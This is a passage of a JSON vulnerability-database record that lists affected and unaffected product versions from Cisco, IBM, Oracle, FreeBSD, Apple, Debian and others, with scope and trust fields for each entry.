"eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central 1.5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration deployment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "series ip phones vpn feature", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8800-11.5.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "project openssl 1.0.1t", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p28", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "webex recording playback client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p38", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.10.1" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.16-37" }, { "model": "10.2-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa50x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-01" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5.1" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4-23" }, { "model": "10.2-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.25-57" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-43" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "buildforge", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "unified workforce optimization quality management sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "meetingplace", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0.1.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex messenger service ep1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.9.9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "mediasense", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8961" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.1" }, { "model": "10.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.1-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa122 ata with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "webex node for mcs", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.12.9.8" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2.8" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11-28" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12150-12" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.17" }, { "model": "cognos tm1 interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.2" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.36" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.8" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "aspera console", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.0.997" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.3" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "lancope stealthwatch flowsensor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected analytics for collaboration 1.0.1q", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.7" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.34" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2)" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "mmp server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.0-13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6.7" }, { "model": "prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.3.4.2-4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.6.1" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.4" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.7.0" }, { "model": "openssh for gpfs for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.31" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0.7" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.117" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(3)" }, { "model": "globalprotect agent", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.0" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "webex meetings for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "mds series multilayer switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "ios software and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15-36" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.6" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.10" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t31r1sp6", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "9.3-release-p35", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.8" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3x000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "unified sip proxy", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "10.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.3" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa50x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5" }, { "model": "ata series analog terminal adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.8" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "unified communications for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions if03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "identity services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.1" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.10000.5)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.0.0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.4" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "jabber for android mr", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.12" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "connected grid router-cgos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2919" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "lancope stealthwatch smc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "telepresence server on virtual machine mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.2-9" }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70008.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.2" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-110" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.2" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-113" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "spa30x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30-12" }, { "model": "webex meetings client on premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.3" }, { "model": "cognos tm1 fix pack", 